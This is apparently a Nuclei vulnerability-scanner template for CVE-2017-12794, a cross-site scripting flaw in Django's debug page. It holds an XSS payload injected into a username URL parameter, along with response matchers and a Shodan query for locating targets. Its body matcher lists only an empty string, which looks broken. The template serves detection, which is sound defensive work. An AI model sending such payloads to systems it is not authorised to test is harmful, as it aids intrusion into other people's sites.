id: CVE-2017-12794 info: name: Django Debug Page - Cross-Site Scripting author: pikpikcu severity: medium description: | Django 1.10.x before 1.10.8 and 1.11.x before 1.11.5 has HTML autoescaping disabled in a portion of the template for the technical 500 debug page. We detected that right circumstances (DEBUG=True) are present to allow a cross-site scripting attack. impact: | Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade to a patched version of Django or apply the necessary security patches provided by the Django project. reference: - https://twitter.com/sec715/status/1406779605055270914 - https://nvd.nist.gov/vuln/detail/CVE-2017-12794 - https://www.djangoproject.com/weblog/2017/sep/05/security-releases/ - http://web.archive.org/web/20211207172022/https://securitytracker.com/id/1039264 - http://www.securitytracker.com/id/1039264 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2017-12794 cwe-id: CWE-79 epss-score: 0.00219 epss-percentile: 0.59849 cpe: cpe:2.3:a:djangoproject:django:1.10.0:*:*:*:*:*:*:* metadata: max-request: 1 vendor: djangoproject product: django shodan-query: cpe:"cpe:2.3:a:djangoproject:django" tags: cve2017,cve,xss,django,djangoproject http: - method: GET path: - "{{BaseURL}}/create_user/?username=%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E" matchers-condition: and matchers: - type: word part: body words: - "" - type: word part: header words: - "text/html" - type: status status: - 200 # digest: 4a0a00473045022100dd40f8b98cb024e08ced792ee48f082585e3dcbe16d4a041dfc27d3bc8e9678602204ca881acb0274f7a6860ff81f52b3e4759cc01f66e41966c702c26d8c35dda54:922c64590222798bb761d5b6d8e72950